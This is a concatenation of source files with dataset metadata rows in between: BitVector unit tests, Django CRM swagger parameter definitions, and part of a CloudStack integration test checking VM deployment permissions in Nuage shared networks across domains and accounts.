def test_default_max(self):
self.assertEqual(self.bv.max_value, BV_DEFAULT_MAX_VALUE)
def test_item_size(self):
self.assertEqual(self.bv.vector.itemsize, 1)
def test_set_negative(self):
with self.assertRaises(ValueError):
self.bv.set(number=-1)
def test_set_zero(self):
self.bv.set(number=0)
self.assertTrue(self.bv.has(0))
def test_set_gt_max_value(self):
with self.assertRaises(ValueError):
self.bv.set(number=self.bv.max_value + 1)
def test_has_on_empty(self):
for i in range(BV_DEFAULT_MAX_VALUE + 1):
self.assertFalse(self.bv.has(i))
def test_set_even(self):
for i in range(BV_DEFAULT_MAX_VALUE + 1):
if i % 2 == 0:
self.bv.set(number=i)
for i in range(BV_DEFAULT_MAX_VALUE + 1):
if i % 2 == 0:
self.assertTrue(self.bv.has(i), '{0} has to be in bit vector'.format(i))
else:
self.assertFalse(self.bv.has(i), '{0} should not be in bit vector'.format(i))
def test_set_unset(self):
numbers = random.sample(range(0, BV_DEFAULT_MAX_VALUE + 1), 3)
# set
for number in numbers:
self.bv.set(number)
# check has number
for number in numbers:
self.assertTrue(self.bv.has(number), '{0} has to be in bit vector'.format(number))
# unset
for number in numbers:
self.bv.unset(number)
# check has number
for number in numbers:
self.assertFalse(self.bv.has(number), '{0} should not be in bit vector'.format(number))
class TestBitVectorLargeMaxValue(unittest.TestCase):
def setUp(self):
self.max_value = 1000000000
self.bv = BitVector(max_value=self.max_value)
def test_default_max(self):
self.assertEqual(self.bv.max_value, self.max_value)
def test_item_size(self):
self.assertEqual(self.bv.vector.itemsize, 1)
def test_set_negative(self):
with self.assertRaises(ValueError):
self.bv.set(number=-1)
def test_set_zero(self):
self.bv.set(number=0)
self.assertTrue(self.bv.has(0))
def test_set_gt_max_value(self):
with self.assertRaises(ValueError):
self.bv.set(number=self.bv.max_value + 1)
def test_set_unset(self):
numbers = random.sample(range(0, self.max_value + 1), 30000)
# set
for number in numbers:
self.bv.set(number)
# check has number
for number in numbers:
self.assertTrue(self.bv.has(number), '{0} has to be in bit vector'.format(number))
# unset
for number in numbers:
self.bv.unset(number)
# check has number
for number in numbers:
self.assertFalse(self.bv.has(number), '{0} should not be in bit vector'.format(number))
def tearDown(self):
del self.bv
| 30.796117
| 99
| 0.617591
| 446
| 3,172
| 4.255605
| 0.139013
| 0.091675
| 0.047418
| 0.071128
| 0.851423
| 0.841412
| 0.770285
| 0.75764
| 0.729189
| 0.729189
| 0
| 0.018671
| 0.27396
| 3,172
| 103
| 100
| 30.796117
| 0.805471
| 0.027427
| 0
| 0.7
| 0
| 0
| 0.056549
| 0
| 0
| 0
| 0
| 0
| 0.242857
| 1
| 0.242857
| false
| 0
| 0.042857
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc409d500bf2d8e97a144e1855d2d2f5fdf23705
| 2,829
|
py
|
Python
|
accounts/swagger_params.py
|
deeptipandey111/sabkadashboard
|
c5d0de173bb9027781876256f54d79ba63075e80
|
[
"MIT"
] | 1
|
2021-08-23T05:25:30.000Z
|
2021-08-23T05:25:30.000Z
|
accounts/swagger_params.py
|
MrNevil/Django-CRM
|
8cb9803748bb3e03f843c47413232185f78261f2
|
[
"MIT"
] | null | null | null |
accounts/swagger_params.py
|
MrNevil/Django-CRM
|
8cb9803748bb3e03f843c47413232185f78261f2
|
[
"MIT"
] | 1
|
2021-03-25T04:01:27.000Z
|
2021-03-25T04:01:27.000Z
|
from drf_yasg import openapi
company_params_in_header = openapi.Parameter(
"company", openapi.IN_HEADER, required=True, type=openapi.TYPE_STRING
)
account_list_get_params = [company_params_in_header]
account_list_post_params = [company_params_in_header]
account_create_get_params = [company_params_in_header]
account_create_post_params = [
company_params_in_header,
openapi.Parameter(
"name", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"phone", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"email", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_address_line",
openapi.IN_QUERY,
required=True,
type=openapi.TYPE_STRING,
),
openapi.Parameter(
"billing_street", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_city", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_state", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_postcode", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_country", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"contacts", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
]
account_update_get_params = [company_params_in_header]
account_update_post_params = [
company_params_in_header,
openapi.Parameter(
"name", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"phone", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"email", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_address_line",
openapi.IN_QUERY,
required=True,
type=openapi.TYPE_STRING,
),
openapi.Parameter(
"billing_street", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_city", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_state", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_postcode", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"billing_country", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"contacts", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
]
company_params = [
company_params_in_header,
]
| 30.095745
| 85
| 0.698834
| 329
| 2,829
| 5.705167
| 0.100304
| 0.179009
| 0.179009
| 0.257326
| 0.961108
| 0.946723
| 0.92488
| 0.816196
| 0.816196
| 0.816196
| 0
| 0
| 0.195475
| 2,829
| 93
| 86
| 30.419355
| 0.824692
| 0
| 0
| 0.831325
| 0
| 0
| 0.081654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012048
| 0
| 0.012048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dca034e25082beddd122db12f2bb62b4a914089f
| 120,763
|
py
|
Python
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 14
|
2015-01-12T13:46:12.000Z
|
2021-07-19T19:33:28.000Z
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 8
|
2020-11-16T17:21:07.000Z
|
2022-02-01T01:06:07.000Z
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 8
|
2015-07-17T12:36:51.000Z
|
2018-08-09T16:23:40.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Component tests for Shared Network functionality with Nuage VSP SDN plugin:
Public Shared Network
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.utils import cleanup_resources
from marvin.lib.base import (Account,
Domain,
User,
VirtualMachine,
Network,
NetworkOffering)
from marvin.cloudstackException import CloudstackAclException
# Import System modules
from nose.plugins.attrib import attr
import random
import string
class TestNuagePublicSharedNetwork(nuageTestCase):
"""Test Shared Network functionality with Nuage VSP SDN plugin:
Public Shared Network
"""
@classmethod
def setUpClass(cls):
"""
Create the following domain tree and accounts that are required for
executing Nuage VSP SDN plugin test cases for shared networks:
Under ROOT - create domain D1
Under domain D1 - Create two subdomains D11 and D12
Under each of the domains - create one admin user and couple of
regular users.
Create shared network with the following scope:
1. Network with scope="all"
2. Network with scope="domain" with no subdomain access
3. Network with scope="domain" with subdomain access
4. Network with scope="account"
"""
super(TestNuagePublicSharedNetwork, cls).setUpClass()
cls.sharednetworkdata = cls.test_data["acl"]
cls.nuagenetworkdata = cls.test_data["nuagevsp"]
cls.domain_1 = None
cls.domain_2 = None
try:
# backup default apikey and secretkey
cls.default_apikey = cls.api_client.connection.apiKey
cls.default_secretkey = cls.api_client.connection.securityKey
# Create domains
cls.domain_1 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain1"]
)
cls.domain_11 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain11"],
parentdomainid=cls.domain_1.id
)
cls.domain_111 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain111"],
parentdomainid=cls.domain_11.id,
)
cls.domain_12 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain12"],
parentdomainid=cls.domain_1.id
)
cls.domain_2 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain2"]
)
# Create 1 admin account and 2 user accounts for doamin_1
cls.account_d1 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1"],
admin=True,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1)
cls.user_d1_apikey = user.apikey
cls.user_d1_secretkey = user.secretkey
cls.account_d1a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1A"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1a)
cls.user_d1a_apikey = user.apikey
cls.user_d1a_secretkey = user.secretkey
cls.account_d1b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1B"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1b)
cls.user_d1b_apikey = user.apikey
cls.user_d1b_secretkey = user.secretkey
# Create 1 admin and 2 user accounts for doamin_11
cls.account_d11 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11"],
admin=True,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11)
cls.user_d11_apikey = user.apikey
cls.user_d11_secretkey = user.secretkey
cls.account_d11a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11A"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11a)
cls.user_d11a_apikey = user.apikey
cls.user_d11a_secretkey = user.secretkey
cls.account_d11b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11B"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11b)
cls.user_d11b_apikey = user.apikey
cls.user_d11b_secretkey = user.secretkey
# Create 2 user accounts and 1 admin account for doamin_111
cls.account_d111 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111"],
admin=True,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111)
cls.user_d111_apikey = user.apikey
cls.user_d111_secretkey = user.secretkey
cls.account_d111a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111A"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111a)
cls.user_d111a_apikey = user.apikey
cls.user_d111a_secretkey = user.secretkey
cls.account_d111b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111B"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111b)
cls.user_d111b_apikey = user.apikey
cls.user_d111b_secretkey = user.secretkey
# Create 2 user accounts for doamin_12
cls.account_d12a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD12A"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d12a)
cls.user_d12a_apikey = user.apikey
cls.user_d12a_secretkey = user.secretkey
cls.account_d12b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD12B"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d12b)
cls.user_d12b_apikey = user.apikey
cls.user_d12b_secretkey = user.secretkey
# Create 1 user account for domain_2
cls.account_d2a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD2"],
admin=False,
domainid=cls.domain_2.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d2a)
cls.user_d2a_apikey = user.apikey
cls.user_d2a_secretkey = user.secretkey
# Create 1 user account and admin account in "ROOT" domain
cls.account_roota = Account.create(
cls.api_client,
cls.sharednetworkdata["accountROOTA"],
admin=False,
)
user = cls.generateKeysForUser(cls.api_client, cls.account_roota)
cls.user_roota_apikey = user.apikey
cls.user_roota_secretkey = user.secretkey
cls.account_root = Account.create(
cls.api_client,
cls.sharednetworkdata["accountROOTA"],
admin=True,
)
user = cls.generateKeysForUser(cls.api_client, cls.account_root)
cls.user_root_apikey = user.apikey
cls.user_root_secretkey = user.secretkey
# service offering is already created in Nuagetestcase
cls.sharednetworkdata['mode'] = cls.zone.networktype
# As admin user , create shared network with scope "all",
# "domain" with subdomain access,
# "domain" without subdomain access and "account"
cls.api_client.connection.apiKey = cls.default_apikey
cls.api_client.connection.securityKey = cls.default_secretkey
cls.test_data["nuagevsp"]["shared_nuage_public_network_offering"][
"serviceProviderList"].update({"UserData": 'VirtualRouter'})
cls.test_data["nuagevsp"]["shared_nuage_public_network_offering"][
"supportedservices"] = 'Dhcp,Connectivity,UserData'
cls.shared_network_offering = NetworkOffering.create(
cls.api_client,
cls.test_data["nuagevsp"][
"shared_nuage_public_network_offering"],
conservemode=False
)
# Enable Network offering
cls.shared_network_offering.update(cls.api_client, state='Enabled')
cls.shared_network_offering_id = cls.shared_network_offering.id
cls.shared_network_all = Network.create(
cls.api_client,
cls.test_data["nuagevsp"]["network_all"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id
)
cls.shared_network_domain_d11 = Network.create(
cls.api_client,
cls.test_data["nuagevsp"][
"network_domain_with_no_subdomain_access"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_11.id,
subdomainaccess=False
)
cls.shared_network_domain_with_subdomain_d11 = Network.create(
cls.api_client,
cls.test_data["nuagevsp"][
"network_domain_with_subdomain_access"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_11.id,
subdomainaccess=True
)
cls.shared_network_account_d111a = Network.create(
cls.api_client,
cls.test_data["nuagevsp"]["network_account"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_111.id,
accountid=cls.account_d111a.user[0].username
)
cls.vmdata = {"name": "test",
"displayname": "test"
}
cls._cleanup = [
cls.account_root,
cls.account_roota,
cls.shared_network_all,
cls.shared_network_offering,
cls.service_offering,
]
user_data = ''.join(random.choice(
string.ascii_uppercase + string.digits) for x in range(2500))
cls.vmdata["userdata"] = user_data
except Exception as e:
cls.domain_1.delete(cls.api_client, cleanup="true")
cls.domain_2.delete(cls.api_client, cleanup="true")
cleanup_resources(cls.api_client, cls._cleanup)
raise Exception(
"Failed to create the setup required to execute the test "
"cases: %s" % e)
return
@classmethod
def tearDownClass(cls):
cls.api_client.connection.apiKey = cls.default_apikey
cls.api_client.connection.securityKey = cls.default_secretkey
cls.domain_1.delete(cls.api_client, cleanup="true")
cls.domain_2.delete(cls.api_client, cleanup="true")
cleanup_resources(cls.api_client, cls._cleanup)
return
def setUp(self):
self.api_client = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
def tearDown(self):
# restore back default apikey and secretkey
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
return
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=all
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_all_domainuser(self):
"""Validate that ROOT admin is able to deploy a VM for other users in
a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-all-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-all-root-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1a.name and
vm.domainid == self.account_d1a.domainid,
True,
"ROOT admin is not able to deploy a VM for other users in a "
"shared network with scope=all")
subnet_id = self.get_subnet_id(self.shared_network_all.id,
self.nuagenetworkdata["network_all"][
"gateway"])
self.verify_vsd_enterprise_vm(self.account_d1a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_all_domainadminuser(
self):
"""Validate that ROOT admin is able to deploy a VM for a domain admin
users in a shared network with scope=all
"""
# Deploy VM for an admin user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-all-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-all-root-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1.name and
vm.domainid == self.account_d1.domainid,
True,
"ROOT admin is not able to deploy a VM "
"for a domain admin users in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d1.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_all.id,
self.nuagenetworkdata["network_all"][
"gateway"])
self.verify_vsd_enterprise_vm(self.account_d1.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_all_subdomainuser(self):
"""Validate that ROOT admin is able to deploy a VM for any user in a
subdomain in a shared network with scope=all
"""
# Deploy VM as user in a subdomain under ROOT
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-all-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-root-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"ROOT admin is not able to deploy a VM"
" for any user in a subdomain in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_all.id,
self.nuagenetworkdata["network_all"][
"gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_all_subdomainadminuser(
self):
"""Validate that ROOT admin is able to deploy a VM for admin user in a
domain in a shared network with scope=all
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-all-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-all-root-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"ROOT admin is not able to deploy a VM for admin user in a domain "
"in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_all.id,
self.nuagenetworkdata["network_all"][
"gateway"])
self.verify_vsd_enterprise_vm(self.account_d11.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_all_ROOTuser(self):
"""Validate that ROOT admin is able to deploy a VM for user in ROOT
domain in a shared network with scope=all
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-all-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-all-root-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_roota, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_roota.name and
vm.domainid == self.account_roota.domainid,
True,
"ROOT admin is not able to deploy a VM for user in ROOT domain "
"in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_roota.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_all.id,
self.nuagenetworkdata["network_all"][
"gateway"])
self.verify_vsd_enterprise_vm(self.account_roota.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=Domain and no subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_domainuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain user in a
shared network with scope=domain with no subdomain access
"""
# Deploy VM as user in a domain that has shared network with no
# subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"ROOT admin is not able to deploy a VM for domain user in a "
"shared network with scope=domain with no subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_d11.id,
self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_domain_d11, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_domainadminuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain admin
user in a shared network with scope=domain with no subdomain access
"""
# Deploy VM as an admin user in a domain that has shared network with
# no subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_d11,
testdata=self.vmdata, account=self.account_d11,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"ROOT admin is not able to deploy VM for domain admin user in "
"shared network with scope=domain with no subdomain access")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_domain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_d11.id,
self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11.domainid,
self.shared_network_domain_d11, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_subdomainuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for sub domain
user in a shared network with scope=domain with no subdomain access
"""
# Deploy VM as user in a subdomain under a domain that has shared
# network with no subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d111a.name,
domainid=self.account_d111a.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for sub domain user in a "
"shared network with scope=domain with no subdomain access")
except Exception as e:
self.debug(
"When a user from a subdomain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for sub domain user in a shared network with "
"scope=domain with no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_subdomainadmin(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for sub domain
admin user in a shared network with scope=domain with no subdomain
access
"""
# Deploy VM as an admin user in a subdomain under a domain that has
# shared network with no subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"ROOT admin is able to deploy VM for sub domain admin user in "
"a shared network with scope=domain with no subdomain access")
except Exception as e:
self.debug(
"When a admin user from a subdomain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for sub domain admin user in a shared "
"network with scope=domain with no subdomain access")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_parentdomuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain user in a shared network with scope=domain with no subdomain
access
"""
# Deploy VM as user in parentdomain of a domain that has shared network
# with no subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d1a.name,
domainid=self.account_d1a.domainid
)
self.fail(
" ROOT admin is able to deploy a VM for parent domain user in "
"a shared network with scope=domain with no subdomain access")
